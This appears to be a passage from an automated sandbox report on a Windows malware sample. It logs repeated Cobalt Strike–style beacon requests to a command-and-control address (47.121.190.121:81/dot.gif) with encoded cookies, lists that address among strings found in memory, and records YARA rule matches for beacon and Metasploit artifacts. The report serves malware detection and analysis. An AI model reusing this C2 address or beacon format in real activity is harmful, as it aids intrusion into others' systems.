            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: k2vUsu5VZ5.exe, 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577505037.000000000083F000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.0000000000836000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2600913090.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gif1
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2505423500.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2539034895.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif1
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gif12
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2527967708.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2800732875.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2459856839.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2839564905.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2788807808.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2777722612.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2550753587.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2564353012.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifP
            Source: k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifl
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2516505810.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2347746904.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2483467740.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000002.4094875365.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifu
            Source: k2vUsu5VZ5.exe, 00000000.00000002.4094719689.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gify-
            Source: k2vUsu5VZ5.exe, 00000000.00000003.2505423500.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/dot.gifz
            Source: k2vUsu5VZ5.exe, 00000000.00000003.1974275008.000000000080B000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2335439729.00000000007DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.121.190.121:81/r9dN

            System Summary

            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
